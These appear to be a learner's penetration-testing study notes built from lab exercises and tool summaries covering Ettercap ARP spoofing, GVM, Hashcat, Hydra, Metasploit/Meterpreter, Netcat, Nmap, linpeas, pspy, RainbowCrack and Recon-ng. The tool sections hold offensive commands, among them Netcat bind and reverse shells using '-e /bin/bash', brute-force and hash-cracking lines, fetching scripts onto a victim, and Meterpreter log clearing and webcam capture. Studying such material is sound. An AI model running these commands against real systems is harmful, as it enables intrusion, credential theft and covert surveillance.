Any IP/MAC address specified as a Target 1 will have all its traffic diverted through the attacking computer that is running Ettercap. In this lab, the attacking computer is the Kali Linux machine at 10.6.6.1. All other computers on the subnet, other than the targets, will communicate normally.

Click the MITM icon on the menu bar (the first circular icon on top right). Select ARP Poisoning… from the dropdown menu. Verify that Sniff remote connections is selected. Click OK.
The MITM exploit is started. If sniffing does not start immediately, click the Start option (play button) at left in the top menu.

Step 2: Perform the ARP spoofing attack.

Return to the terminal window that is running the SSH session with the target user host at 10.6.6.23. Repeat the ping to 10.6.6.13 labuser@3fb0515ea2f7:/$ ping -c 5 10.6.6.13
Use the ip neighbor command to view the ARP table on 10.6.6.23 again. Note the MAC address listed for 10.6.6.13.
Close the Ettercap graphical user interface. Leave the SSH connection to 10.6.6.23 active.

Part 3: Use [[Wireshark]] to Observe the ARP Spoofing Attack

Step 1: Select the Target Devices and Perform the MITM attack using the CLI

In this step, you will use the command line interface in Ettercap to perform ARP spoofing and write a .pcap file that can be opened in Wireshark. Refer to the help information for Ettercap to interpret the options used in the commands.

Return to the terminal session that is connected via SSH to 10.6.6.23. Ping the IP addresses 10.6.6.11 and 10.6.6.13. 10.6.6.11 is another host on the LAN that we will verify is unaffected by the attack. Then, use the ip neighbor command to find the MAC addresses associated with the IP addresses of the two systems.

labuser@3fb0515ea2f7:/$ **ping -c 5 10.6.6.11**
labuser@3fb0515ea2f7:/$ **ping -c 5 10.6.6.13**
labuser@3fb0515ea2f7:/$ **ip neighbor**

Note: To find the MAC of 10.6.6.23, go to the SSH session terminal and enter the ip address command. Determine the MAC address of the interface that is addressed on the 10.6.6.0/24 network.

The ettercap -T command runs Ettercap in text mode, instead of using the GUI interface. The syntax to start Ettercap and specify the targets is: sudo ettercap -T options -q -i interface --write file name -- mitm arp /target 1// /target 2//.

| Options and Values | Meaning | | ------------------ | -------------------------------------------------------------------------------------------- | | -T | user the text only interface | | -q | run the command in quiet mode to simplify output | | -i | specify the sniffing/attacking network interface | | --write | Write packets to a .pcap file that can be opened in Wireshark. Specify the name for the file | | --mitm arp | Conduct the ARP poisoning MITM attack | | /target1// | the IP address of the target user host | | /target2// | the IP address of the target server |

In a terminal window, enter the command as follows to save the pcap file in the current working directory: ettercap -T -q -i br-internal --write mitm-saved.pcap --mitm arp /10.6.6.23// /10.6.6.13// When Ettercap starts, you will receive output.
Return to the SSH terminal session to 10.6.6.23. Ping the two IP addresses, 10.6.6.11 and 10.6.6.13, again. Use the ip neighbor command to view the associated MAC addresses.
Close the SSH terminal session that is connected to 10.6.6.23 and return to the terminal session running Ettercap in text mode. Enter q to quit Ettercap.

Step 2: Open Wireshark to view the Saved PCAP file.

In this step, you will examine the .pcap file that Ettercap created.

Review the MAC addresses that you recorded in Step 1c. The MAC address for 10.6.6.23 can be found in the output of the Ettercap text interface in Target Group 1.
In the Kali terminal window, start Wireshark with the mitm-saved.pcap file that you created with Ettercap. wireshark mitm-saved.pcap
The Ettercap attack computer first broadcasts ARP requests to obtain the actual MAC addresses for the two target hosts, 10.6.6.23 and 10.6.6.11. The attacking machine then begins to send ARP responses to both target hosts using its own MAC for both IP addresses. This causes the two target hosts to address the Ethernet frames to the attacker’s computer, which enables it to collect data as an on-path attacker.

[Vault: Tools] ffuf

Thu, 09 Oct 2025 10:02:49 GMT

ffuf

[Vault: Tools] Greenbone Vulnerability Management (GVM)

Thu, 09 Oct 2025 10:02:49 GMT

GVM is part of the Open Source Vulnerability Management suite of products produced by Greenbone Networks GmbH. The GVM scanner is one of the most widely used open-source vulnerability scanners. Unlike Nmap, GVM uses a graphical user interface to initiate scans and report vulnerability scan results.

Step 1: Verify the GVM Product Installation.

Before beginning any scan, it is important to verify that GVM is correctly installed and that the files it uses to identify vulnerabilities are up-to-date.

Verify the setup of the GVM service using the sudo gvm-check-setup command. This command verifies that the setup completed correctly and the necessary files are available. The verification will flag any issues that need fixing and will provide the commands to use to fix the issues. sudo gvm-check-setup
If there are issues, execute the suggested command to fix the problem and then re-run the gvm-check-setup command. When all issues are addressed, the command outputs the string “It seems like your GVM [version] installation is OK.”.
Just for this activity, stop the GVM service so you can observe the startup output. sudo gvm-stop

Step 2: Open the GVM Scanner GUI.

Start the GVM scanner using the sudo gvm-start command. You can also access the gvm-start script using the Applications menu on the Kali desktop, Kali ->02-Vulnerability Analysis -> gvm start. It is possible that GVM may already be running as a result of the check setup process. The output of the command should be similar to what is shown below. At the end of the output, a message that the scanner is loading in Firefox will appear. ● gsad.service - Greenbone Security Assistant daemon (gsad) ● gvmd.service - Greenbone Vulnerability Manager daemon (gvmd) ● ospd-openvas.service - OSPd Wrapper for the OpenVAS Scanner (ospd-openvas)
A browser window will open with a security warning that can be ignored. If the browser does not automatically open, start your browser manually and navigate to https://127.0.0.1:9392. Click the Advanced button and scroll down and accept the risk on the warning screen to proceed.
In the Greenbone Security Assistant login box, enter admin as the username and kali as the password.

Username: admin
Password: kali

The GVM Scanner application GUI should open in the browser. Select Scans -> Tasks from the menu bar. At the upper left of the Tasks window appear three icons. Select the Task Wizard icon that looks like a magic wand. Choose Task Wizard from the dropdown menu.

Step 3: Scan the Target Host for Vulnerabilities

The GVM Scanner application GUI should open in the browser. Select Scans -> Tasks from the menu bar. At the upper left of the Tasks window appear three icons. Select the Task Wizard icon that looks like a magic wand. Choose Advanced Task Wizard from the dropdown menu.
In the Advanced Task Wizard window, enter Metasploitable as the scan name. In the Target Host(s) field, enter the IP address of Metasploitable, 172.17.0.2. Leave the rest of the settings unchanged and click Create to create the task and start the scan.
The Task window indicates the task is running. At the bottom of the window, the task Metasploitable is listed, and the status bar shows the percent complete. Wait until the status shows Done (100% complete). This could take 30 minutes or more.
Click the number 1 under the Reports column in the Metasploitable row, next to the status indicator. The report list opens with an entry for the current day and time and the task named Metasploitable.
Open the report by clicking the date and time link under the Date column. The report window opens. There are eleven tabs that show various results that were found during the scan. Click the Results tab. The vulnerabilities found are listed in order of severity.
When the scan is complete, click the timestamp under the Date column to view the report detail.
The CVEs associated with the vulnerabilities that were found on the host can be viewed by clicking the CVEs tab. Explore the other tabs.
Download the report by clicking the Download Filtered Report button from the menu in the upper left of the report page. It has a downward-pointing arrow icon. In the settings box, choose to download the report in PDF format. After a brief delay, the PDF file should open in your browser.
Click the other headers on the report and view the information provided.

Step 4: Interpret the scan results.

GVM provides a detailed description of the vulnerabilities including methods to mitigate each vulnerability.

Click the The rexec service is running vulnerability listed in the Results tab. GVM provides a summary of the finding and additional details. The Insight section explains a little about the vulnerability and the Solution section gives mitigation suggestions.
Click the CVE associated with the rexec vulnerability. A brief description of the CVE opens.
You can obtain additional information about the Network Vulnerability Test (NVT) that discovered this CVE by clicking the NVT at the bottom of the CVE window. An NVT is a script that can be executed to check for specific vulnerabilities, including CVEs.
Click the back arrow in the browser to return to the report screen. The rexec services typically run on TCP ports 512, 513, or 514.
Select the Ports tab to view the open ports on the Metasploitable system.
Explore the other vulnerabilities and focus on how you might use them to exploit the 172.17.0.2 client.

Step 5: Clean Up

When you are done with GVM services, use the following command to stop GVM. sudo gvm-stop

[Vault: Tools] Hashcat

Thu, 09 Oct 2025 10:02:49 GMT

"World's fastest password cracker"
used to crack hashes It allows you to use graphical processing units (GPUs) to accelerate the password-cracking process.
Hashcat comes with Kali Linux and other penetration testing Linux distributions. You can also download it from https://hashcat.net/hashcat.

[!tip] Basic usage

hashcat -m 0 [hashes] [dictionary]

-m specifies hash type
- 0 - md5
-a specifies attack mode
- 0 = Straight
- 1 = Combination
- 3 = Brute-force
- 6 = Hybrid Wordlist + Mask
- 7 = Hybrid Mask + Wordlist
-o specifies the output file

eg: hashcat -m 0 -a 0 -o cracked.txt hashes.txt /usr/share/wordlist/rockyou.txt

[Vault: Tools] Hydra

Thu, 09 Oct 2025 10:02:49 GMT

Used for Bruteforce attacks

Hydra is a tool that is used to guess and crack credentials.
Hydra is typically used to interact with a victim server (for example, web server, FTP server, SSH server, file server) and try a list of username/password combinations.

[!TIP] Basic usage

hydra -l [user | root] -P [wordlist (/usr/share/wordlists/metasploit/unix_passwords.txt)] [uri (ssh://192.168.57.25:22)] -t [no of threads (4)] -V

 -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
 -p PASS or -P FILE try password PASS, or load several passwords from FILE
 -C FILE    colon separated "login:pass" format, instead of -L/-P options
 -M FILE    list of servers to attack, one entry per line, ':' to specify port
 -t TASKS   run TASKS number of connects in parallel per target (default: 16)
 -U         service module usage details

For example, say you know that an FTP user’s username is omar. You can then try a file that contains a list of passwords against an FTP server (10.1.2.3). To accomplish this, you use the following command: hydra -l omar -P passwords.txt ftp://10.1.2.3

We can also use metaspoit for bruteforcing ssh

[Vault: Tools] linpeas

Thu, 09 Oct 2025 10:02:49 GMT

is a tool that hunts for any privilege escalation

https://github.com/pentestmonkey/php-reverse-shell

create a server to host the linpeas.sh file sudo python3 -m http.server 80
then put the script in target machine put in /tmp folder wget [uri of server (http://192.168.60.4)]/linpeas.sh
execute it chmod +x linpeas.sh to make it executable ./linpeas.sh\

[Vault: Tools] Metasploit

Thu, 09 Oct 2025 10:02:49 GMT

Metasploit is by far the most popular exploitation framework in the industry.

It was created by a security researcher named H. D. Moore and then sold to Rapid7.
There are two versions of Metasploit: a community (free) edition and a professional edition.
Metasploit, which is written in Ruby, has a robust architecture.
Metasploit is installed in /usr/share/metasploit-framework by default in Kali Linux. All corresponding files, modules, documentation, and scripts are located in that folder.

Modules

Metasploit has several modules:

auxiliary
encoders
exploits
nops
payloads
post (for post-exploitation)

[!tip] Usage : You can launch the Metasploit console by using the msfconsole command.

msfconsole

search [service/vuln]

use [exploit name or no]

set RHOSTS [ip of victim]

options to see current config

show targets

run or exploit

to change payloads

set payload [name]

Payload Types:

Non-Staged
- Sends exploit shellcode all at once
- Larger in size and wont always work
- eg: windows/meterpreter_reverse_tcp
Staged
- Sends payload in stages
- can be less stable
- eg: windows/meterpreter/reverse_tcp

Meterpreter

The Meterpreter module of the Metasploit framework can be used to create bind and reverse shells and to perform numerous other post-exploitation tasks. Meterpreter payload for a bind TCP connection (after exploitation) being set: set payload windows/x64/meterpreter/bind_tcp

Common Meterpreter commands

| Meterpreter Command | Description | | ---------------------------- | ------------------------------------------------------------------------------------------------------------------ | | cat, cd, pwd, and ls | These commands are the same as the ones in Linux or Unix-based systems. | | lpwd and lcd | These commands are used to display and change the local directory (on the attacking system). | | clearev | This command is used to clear the Application, System, and Security logs on a Windows-based system. | | download | This command is used to download a file from a victim system. | | edit | This command is used to open and edit a file on a victim system using the Vim Linux environment. | | execute | This command is used to run commands on the victim system. | | getuid | This command is used to display the user logged in on the compromised system. | | getsystem | | | sysinfo | | | screenshot | | | hashdump | This command is used to dump the contents of the SAM database in a Windows system. | | idletime | This command is used to display the number of seconds that the user at the victim system has been idle. | | ipconfig | This command is used to display the network interface configuration and IP addresses of the victim system. | | migrate | This command is used to migrate to a different process on the victim system. | | ps | This command is used to display a list of running processes on the victim system. | | resource | This command is used to execute Meterpreter commands listed inside a text file, which can help accelerate actions. | | search | This command is used to locate files on the victim system. | | shell | This command is used to go into a standard shell on the victim system. | | upload | This command is used to upload a file to the victim system. | | webcam_list | This command is used to display all webcams on the victim system. | | webcam_snap | This command is used to take a snapshot (picture) using a webcam of the victim system. |

Accelerate the tasks in Metasploit

You can use the PostgreSQL database in Kali to accelerate the tasks in Metasploit and index the underlying components.

You need to start the PostgreSQL service before using the database by using the following command: service postgresql start
After starting the PostgreSQL service, you need to create and initialize the Metasploit database with the msfdb init command. Set password.
You can search for exploits, auxiliary, and other modules by using the search command

Metasploit Unleashed is a free detailed Metasploit course released by Offensive Security. The course can be accessed at https://www.offensive-security.com/metasploit-unleashed.

[Vault: Tools] Nessus

Thu, 09 Oct 2025 10:02:49 GMT

Vulnerabilty Scanner from Tenable
has several features that allow you to perform continuous monitoring and compliance analysis.
Nessus can be downloaded from https://www.tenable.com/downloads/nessus.

NOTE Tenable also has a cloud-based solution called Tenable.io. For information about Tenable.io, see https://www.tenable.com/products/tenable-io.

to install download nessus file, dpkg -i [nessus file]
to start: /etc/init.d/nessusd start
You can start Nessus Scanner by typing /bin/systemctl start nessusd.service
Then go to https://kali:8834/ to configure your scanner
signup and login
create a basic scan
- give name and discription
- set target ip
- set scan type in discovery (ports)
- set scan type in assessment (vulnerabilties)
- save and launch

[Vault: Tools] Netcat

Thu, 09 Oct 2025 10:02:49 GMT

[!tip] nc - TCP/IP swiss army knife

netcat is a simple unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

| Flag | Meaning | | ---- | ----------------------------------------------------------------------- | | -l | Listen mode (used to create a server or wait for incoming connections). | | -v | Verbose output (add more vs for more detail, e.g., -vv). | | -p | Specify local port (used with -l). | | -n | Numeric-only IP addresses (skip DNS resolution). | | -u | Use UDP instead of TCP. | | -z | Zero-I/O mode (useful for port scanning). | | -w | Timeout for connects and final net reads (e.g., -w 5). | | -e | Execute a program after connection (common for reverse shells). |

to open listener : nc -nvlp [port]

Create a bind shell

![[attachments/Pasted-image-20231220202136.png|756x425]]

An attacker could use the nc -lvp [port] -e /bin/bash command in the compromised system to create a listener on port 4444 and execute (-e) the Bash shell (/bin/bash).

This will open up a listener on the victim machine On the attacking system , the nc -nv [ip] [port] command is used to connect to the victim. Once the attacker connects to the victim, he is able to execute commands on the victim machine.

One of the challenges of using bind shells is that if the victim’s system is behind a firewall, the listening port might be blocked. However, if the victim’s system can initiate a connection to the attacking system on a given port, a reverse shell can be used to overcome this challenge.

Create a reverse shell

![[attachments/Pasted-image-20231220202147.png|759x427]]

To create a reverse shell, you can use the `nc -lvp [port] command in the attacking system to listen to a specific port.

this will create a listener in the Attacking System. Then on the compromised host (the victim), you can use the nc [ip] [port] -e /bin/bash command to connect to the attacking system.

Once the victim system is connected to the attacking system , you can start invoking commands.

able 8-2 lists several useful Netcat commands that could be used in a penetration testing engagement.

Useful Netcat Commands

| Command | Description | | -------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------- | | nc -nv <IP Address> <Port> | Using Netcat to connect to a TCP port | | nc -lvp <port> | Listening on a given TCP port | | nc -lvp 1234 > output.txt# Receiving systemnc -nv <IP Address> < input.txt# Sending system | Used to transfer a file | | nc -nv <IP Address> 80GET / HTTP/1.1 | Connecting and receiving a web page. Port 443 can be used for HTTPS connections. | | nc -z <IP Address> <port range> | Using Netcat as a port scanner |

Additional Netcat commands and references for post-exploitation tools can be obtained from https://github.com/The-Art-of-Hacking/art-of-hacking.

[Vault: Tools] Nmap

Thu, 09 Oct 2025 10:02:49 GMT

Nmap (Network Mapper) is a powerful, open-source tool used for network discovery, security auditing, and network inventory. Nmap can be used to scan networks, discover hosts, identify open ports, detect operating systems, and even run scripts to automate tasks.

nmap usage

nmap -T4 -p- -A [ip]

-p -> ports to scan
- -p- -> scan all ports
- blank -> scans top 1000 ports
- -p 443,80

| Option | Description | | ---------------- | -------------------------------------------------------------------------------------------------------- | | -A | Aggressive scan that enables OS detection, version detection, script scanning and traceroute | | -O | Enables OS detection | | -p | Allows for specific ports or port ranges to be scanned | | -sF | Performs TCP FIN scan | | -sn | Performs host discovery scan | | -sS | Performs TCP SYN scan | | -sT | Performs TCP Connect scan | | -sU | Performs UDP scan | | -sV | Probes open ports to determine service/version info | | -T<0-5> | Sets the timing of the scan. Higher numbers produce results faster. Slower scans elude detection better. | | -v | Increases the verbosity of the output | | --open | Only reports open (or possibly open) ports |

Nmap Scan Types

Nmap SYN scan (-sS)

With an Nmap SYN scan, the tool sends a TCP SYN packet to the TCP port it is probing. This process is also referred to as half-open scanning because it does not open a full TCP connection.

SYN Scan Responses

| Nmap Port Status Reported | Response from Target | Nmap Analysis | | ------------------------- | ------------------------------------------------------- | ----------------------------------------- | | Open | TCP SYN-ACK | The service is listening on the port. | | Closed | TCP RST | The service is not listening on the port. | | Filtered | No response from target or ICMP destination unreachable | The port is firewalled. |

TCP Connect Scan (-sT)

A TCP connect scan actually makes use of the underlying operating system’s networking mechanism to establish a full TCP connection with the target device being scanned. Because it creates a full connection, it creates more traffic (and thus takes more time to run). This is the default scan type that is used if no scan type is specified with the nmap command. However, it should typically be used only when a SYN scan is not an option, such as when a user who is running the nmap command does not have raw packet privileges on the operating system because many of the Nmap scan types rely on writing raw packets.

TCP Connect Scan Responses

|Nmap Port Status Reported|Response from Target|Nmap Analysis| |---|---|---| |Open|TCP SYN-ACK|The service is listening on the port.| |Closed|TCP RST|The service is not listening on the port.| |Filtered|No response from target|The port is firewalled.| A full TCP connect scan requires the scanner to send an additional packet per scan, which increases the amount of noise on the network and may trigger alarms that a half-open scan wouldn’t trigger. Security tools and the underlying targeted system are more likely to log a full TCP connection.

UDP Scan ( -sU )

The majority of the time, you will be scanning for TCP ports, as this is how you connect to most services running on target systems. However, you might encounter some instances in which you need to scan for UDP ports – for example, if you are trying to enumerate a DNS, SNMP, or DHCP server. These services all use UDP for communication between client and server. To scan UDP ports, Nmap sends a UDP packet to all ports specified in the command-line configuration. It waits to hear back from the target. If it receives an ICMP port unreachable message back from a target, that port is marked as closed. If it receives no response from the target UDP port, Nmap marks the port as open/filtered.

UDP Scan Responses

| Nmap Port Status Reported | Response from Target | Nmap Analysis | | ----------------------------- | ---------------------------- | ----------------------------------------- | | Open | Data returned from port | The service is listening on the port. | | Closed | ICMP error message received | The service is not listening on the port. | | Open/filtered | No ICMP response from target | The port is firewalled or timed out. |

TCP FIN Scan ( -sF )

There are times when a SYN scan might be picked up by a network filter or firewall. In such a case, you need to employ a different type of packet in a port scan. With the TCP FIN scan, a FIN packet is sent to a target port. If the port is actually closed, the target system sends back an RST packet. If nothing is received from the target port, you can consider the port open because the normal behavior would be to ignore the FIN packet.

NOTE A TCP FIN scan is not useful when scanning Windows-based systems, as they respond with RST packets, regardless of the port state.

TCP FIN Scan Responses

| Nmap Port Status Reported | Response from Target | Nmap Analysis | | ----------------------------- | ------------------------------- | ------------------------------------ | | Filtered | ICMP unreachable error received | Closed port should respond with RST. | | Closed | RST packet received | Closed port should respond with RST. | | Open/Filtered | No response received | Open port should drop FIN. |

Host Discovery Scan ( -sn )

A host discovery scan is one of the most common types of scans used to enumerate hosts on a network because it can use different types of ICMP messages to determine whether a host is online and responding on a network.

NOTE The default for the -sn scan option is to send an ICMP echo request packet to the target, a TCP SYN to port 443, a TCP ACK to port 80, and an ICMP timestamp request. This is documented at https://nmap.org/book/man-host-discovery.html. If the target responds to the ICMP echo or the aforementioned packets, then it is considered alive.

Timing Options ( -T 0-5 )

The Nmap scanner provides six timing templates that can be specified with the -T option and the template number (0 through 5) or name. Nmap timing templates enable you to dictate how aggressive a scan will be, while leaving Nmap to pick the exact timing values. These are the timing options:

-T0 (Paranoid) : Very slow, used for IDS evasion
-T1 (Sneaky) : Quite slow, used for IDS evasion
-T2 (Polite) : Slows down to consume less bandwidth, runs about 10 times slower than the default
-T3 (Normal) : Default, a dynamic timing model based on target responsiveness
-T4 (Aggressive) : Assumes a fast and reliable network and may overwhelm targets
-T5 (Insane) : Very aggressive; will likely overwhelm targets or miss open ports

Nmap Scripting Engine

Nmap contains the powerful Nmap Scripting Engine (NSE), which enables the programming of various Nmap options and conditional actions to be taken as a result of the responses. NSE has built-in scripts that enumerate users, groups, and network shares.

In Kali Linux, the NSE scripts are located at /usr/share/nmap/scripts by default.
One of the more commonly used scripts for SMB discovery is the smb-enum-users.nse script.
You can enumerate the network shares using another NSE script, smb-enum-shares.nse. To discover shared directories on the target computer. nmap --script smb-enum-shares.nse -p445 [ip] Examine the output created by the smb-enum-shares script. In the output, share names that end with a “$” character represent hidden shares that include system and administrative shares.

Nmap Vulners script to scan for vulnerabilities.

The Vulners script displays known vulnerabilities and the corresponding CVE. The Vulners script uses the open port and software version information to search for common platform enumeration (CPE) names that relate to the identified service. It then makes a request to a remote server to find out if any known vulnerabilities exist for that CPE.

Use the nmap –script command to launch the vulners script. The syntax for the command is nmap -sV --script vulners [--script-args mincvss=<arg_val>] <target> where the script argument mincvss restricts the output to only those CVEs that have a higher CVSS score than the one specified in the argument.

eg:

There are multiple scripts available to find valid usernames using Nmap. One of the most common is the SMB username script. It is a common practice to synchronize OS Users with SMB (Samba or Windows) users. Use the Nmap script smb-brute to find users and to attempt to brute force passwords. sudo nmap -sV -p 445 -script smb-brute 172.17.0.2
- Locate the Host script results section in the command output. Username and password combinations that were uncovered with the Nmap script are listed in this section.

Scan for ips

to scan for ip's in the network, we can use - arp-scan -l - netdiscover -r [ip range (eg: 192.168.57.0/24)]

[Vault: Tools] pspy

Thu, 09 Oct 2025 10:02:49 GMT

unprivileged Linux process snooping

pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems in CTFs. Also great to demonstrate your colleagues why passing secrets as arguments on the command line is a bad idea.

The tool gathers the info from procfs scans. Inotify watchers placed on selected parts of the file system trigger these scans to catch short-lived processes.

download from https://github.com/DominicBreuker/pspy and host it and wget from victim then chmod +x ./pspy

[Vault: Tools] rainbowcrack

Thu, 09 Oct 2025 10:02:49 GMT

Rainbow crack differs from hash cracking utilities that use brute force algorithms in that it uses rainbow tables to crack password hashes. You can download RainbowCrack from http://project-rainbowcrack.com.

Rainbow tables are precomputed tables for reversing cryptographic hash functions. It is possible to use a rainbow table to derive a password by looking at the hashed value.
Rainbow tables are ordinary files and can be created with RainbowCrack, or they can be downloaded from the internet. Creating a rainbow table can take a considerable amount of time and storage space as they are very large, ranging in size from 20GB to more than a terabyte.

Usage

Create a small simple rainbow table that will crack MD5 passwords of up to 3 characters with only lowercase letters. The rtgen program is used to generate rainbow tables based on user specified parameters.
1. Enter the rtgen -h command and review the options. The example rainbow tables are given at the bottom of the output.
2. Create a rainbow table by entering: sudo rtgen md5 loweralpha 1 3 0 1000 1000 0 This command creates a rainbow table that can crack passwords that are three characters long and only consist of lower-case letters. The application created a fille with 1000 entries. Creating more complex rainbow tables can take significant time and use significant resources.
Verify the rainbow table is created. Display the contents of the rainbowcrack directory by entering the command: cd /usr/share/rainbowcrack && ls The newly created rainbow table should be in the directory as an .rt file.

Step 3: Sort the rainbow table.

Next, the rainbow table must be sorted. (Note: be sure to include the space and the period after rtsort as part of the command) sudo rtsort .
Generate a hash for a simple 3-character password which can then be cracked. Enter the command: echo -n 'dog' | md5sum | awk '{print $1}' 06d80eb0c50b49a509b49f2424e8c805
Crack the hash with the rainbow table with RainbowCrack. At the prompt, enter the rcrack . -h 06d80eb0c50b49a509b492424e8c805 command. rcrack . -h 06d80eb0c50b49a509b492424e8c805 Within milliseconds RainbowCrack should crack the hash and reveal the password dog.
You can also crack hashes contained in a .txt file . To crack the hashes in the file, enter the rcrack . -l ~/my_rainbow_hashes.txt command at the prompt. The -l option tells rcrack to use a hash list file as input.

[Vault: Tools] recon-ng

Thu, 09 Oct 2025 10:02:49 GMT

Recon-ng is a menu-based tool that can be used to automate the information gathering of OSINT. Recon-ng comes with Kali Linux and several other penetration testing Linux distributions, and it can be downloaded from https://github.com/lanmaster53/recon-ng.

Recon-ng is an OSINT framework that is similar to the Metasploit exploitation framework or the Social-Engineering Tooklit (SET). If consists of a series of modules that can be run in their own workspaces. The modules can be configured to run with option settings that are specific to the module. This simplifies running Recon-ng at the command line because options for the modules are independently set within the workspace. When you run the module, it uses these settings to perform its searches.

As the name suggests, Recon-ng is used to perform a wide range of reconnaissance activities on different settings that you provide. Some modules are available with the Kali installation and others are available for download and installation in the Recon-ng modules marketplace.

Recon-ng can query several third-party tools, including Shodan, as well as Twitter, Instagram, Flickr, YouTube, Google, GitHub repositories, and many other sites. For some of those tools and sources, you must register and obtain an API key. You can add the API key by using the Recon-ng keys add command. To list all available APIs that Recon-ng can interact with, use the keys list command

Step 1: Create a workspace.

Recon-ng has auto complete. Press the tab button to complete commands and command options. Use the tab key twice to list the available commands and options at different places in the command line. This is very handy.

To run Recon-ng, open a new terminal window and enter recon-ng. You can also start the program by going to the Kali tools menu, searching for the app, and clicking the icon.
Note that the terminal prompt changes to indicate that you are working within the Recon-ng framework. Enter help to get a sense of the commands that are available.
Recon-ng uses workspaces to isolate investigations from one another. Workspaces can be created for different parts of a test or different customers for example. Type workspaces help to view options for the workspaces command. How can you display the available workspaces? Enter the _workspaces list_ command. How can you remove a workspace? Enter the _workspaces remove [workspace_name]_ command.
Create a workspace named test by entering workspaces create followed by the workspace name. Note that the prompt has changed to indicate that you are in this workspace.
Type help to see the commands that are available within workspaces. What command will exit the workspace and return to the main Recon-ng prompt? The back command

Step 2: Investigate modules.

Recon-ng is a modular framework. Modules are Python programs with different functions. They are stored in an external marketplace that permits developers to create their own modules and contribute them for use by others. Return to the Recon-ng prompt. Enter the modules search command. This will display the currently installed modules. How many modules are currently available to you? No modules are installed.

Step 3: Investigate the module marketplace.

Recon-ng will not function without modules. In this step, we will install modules from the Recon-ng marketplace. The module marketplace is a GitHub public repository. Search the web for recon-ng-marketplace to view the repository. Explore the folders to learn more about the modules.

In the terminal, view help for the marketplace command. Use the search option to list all the modules that are currently available. [recon-ng][default] > **marketplace search**
Note that the modules are organized by their category and type. This appears as a path prepended to the name of the module. You can filter the output by adding a search term to the marketplace search command. Try a few different search terms that are related to OSINT information to get a sense of the modules that are available. The module tables have columns for D and K. Search for shodan modules. What are the requirements for these modules? They have dependencies (D) and require API keys (K). The dependencies refer to Python modules that must be installed on your computer to run the module.
To learn more about individual modules, use the marketplace info command followed by the full name of the module, including its category and type. It is easier to select the name of the module and copy and paste it into the command line.

Step 4: Install a new module.

Recon-ng accesses modules from the Github repository and downloads them to Kali when they are installed.

Search the marketplace modules using bing as a search term. Locate a module that requires no dependencies or API keys. Which module did you find? recon/domains-hosts/bing_domain_web
View information for this module.
To install the module, copy the full name, including the path, to the clipboard.
Enter the marketplace install command followed by the full name of the module. [recon-ng][default] > **marketplace install recon/domains-hosts/bing_domain_web**
After installation, enter the modules search command to verify that the new module is now available.
Repeat the process to install the hackertarget module.

Step 5: Run the new modules

Create a new workspace. Name it as you wish.
To start working with a module, it must be initialized. Enter modules load hackertarget to begin working with the module. Note that the prompt changes to reflect the loaded module.
Each module is its own environment. The developers of recon-ng have taken care to keep the framework consistent, so the same commands are available for each module. However, the options can vary. Type info at the module prompt to view important details about the module. What information is available for this module? The name of the module, module version, name of the developer, a brief description, and information about the options. What is the only option for this module? SOURCE
Instead of passing options at the command line, in Recon-ng you set the options and then enter a simple command to execute the module. Use the options set source command to set the only option for this module. Complete the command by specifying the target as hackxor.net.
Verify the option setting with the info command.
Type run to execute the module.
Inspect the output of the command. The output is stored in a database so you can refer to it later. The data that is stored is specific to the workplace in which it was gathered.
Enter the dashboard command. This queries the Recon-ng database and provides a summary of the information that has been gathered. It is specific to this workspace. What is the Recon-ng data label for the subdomains that have been listed? How many were discovered? Recon-ng classifies the subdomains as “hosts.” Nine were discovered.
The show command displays the data for specific categories. Enter the show hosts command to display the list of hosts that were discovered.
Now repeat the process with the bing module. Compare the results with the hackertarget module. How many subdomains did the module find? How does this compare to the hackertarget module? Answers may vary. At the time of this writing, they both found 6 subdomains.

Step 6: Investigate the web interface.

Recon-ng has a web interface that simplifies and improves viewing results that are stored in Recon-ng databases. It also allows easy export of the results tables for reporting purposes.

Open a new terminal.
Enter the recon-web command to start the Recon-ng server process. Note the command output.
In a new browser tab, access the webpage using the URL information provided in the output.
The web interface shows data from the default workspace when first opened. Click the orange workspace name at the top of the page to display data from different workspaces.

Step 1: Start Recon-ng

To start using Recon-ng, you simply run recon-ng from a new terminal window. Example 3-11 shows the command and the initial menu that Recon-ng starts with.

Example 3-11 - Starting Recon-ng

 |--[omar@websploit]--[~] |--- $ recon-ng  [*] Version check disabled.      _/_/_/    _/_/_/_/    _/_/_/    _/_/_/    _/      _/            _/      _/    _/_/_/    _/    _/  _/        _/        _/      _/  _/_/    _/            _/_/    _/  _/          _/_/_/    _/_/_/    _/        _/      _/  _/  _/  _/  _/_/_/_/  _/  _/  _/  _/  _/_/_/  _/    _/  _/        _/        _/      _/  _/    _/_/            _/    _/_/  _/      _/  _/    _/  _/_/_/_/    _/_/_/    _/_/_/    _/      _/            _/      _/    _/_/_/                                                 /\                                          / \\ /\     Sponsored by...               /\  /\/  \\V  \/\                                  / \\/ // \\\\\ \\ \/\                                 // // BLACK HILLS \/ \\                                www.blackhillsinfosec.com                    ____   ____   ____   ____ _____ _  ____   ____  ____                  |____] | ___/ |____| |       |   | |____  |____ |                  |      |   \_ |    | |____   |   |  ____| |____ |____                                    www.practisec.com                        [recon-ng v5.1.2, Tim Tomes (@lanmaster53)]            [4] Recon modules [1] Discovery modules  [recon-ng][default] >

expand_less

Step 2. View available commands

To get an idea of what commands are available in the Recon-ng command-line tool, you can simply type help and press Enter. Example 3-12 shows the output of the help command.

Example 3-12 - Recon-ng help Command

 [recon-ng][default] > help Commands (type [help|?] ): --------------------------------- back           Exits the current context dashboard      Displays a summary of activity db             Interfaces with the workspace's database exit           Exits the framework help           Displays this menu index          Creates a module index (dev only) keys           Manages third party resource credentials marketplace    Interfaces with the module marketplace modules        Interfaces with installed modules options        Manages the current context options pdb            Starts a Python Debugger session (dev only) script         Records and executes command scripts shell          Executes shell commands show           Shows various framework items snapshots      Manages workspace snapshots spool          Spools output to a file workspaces     Manages workspaces [recon-ng][default] >

expand_less

Step 3. Search for available modules.

Before you can start gathering information using the Recon-ng tool, you need to understand what modules are available. (You can see from the initial screen in Example 3-11 the current number of modules that are installed in Recon-ng.) Recon-ng comes with a “marketplace,” where you can search for available modules to be installed. You can use the marketplace search command to search for all the available modules in Recon-ng, as demonstrated in Example 3-13.
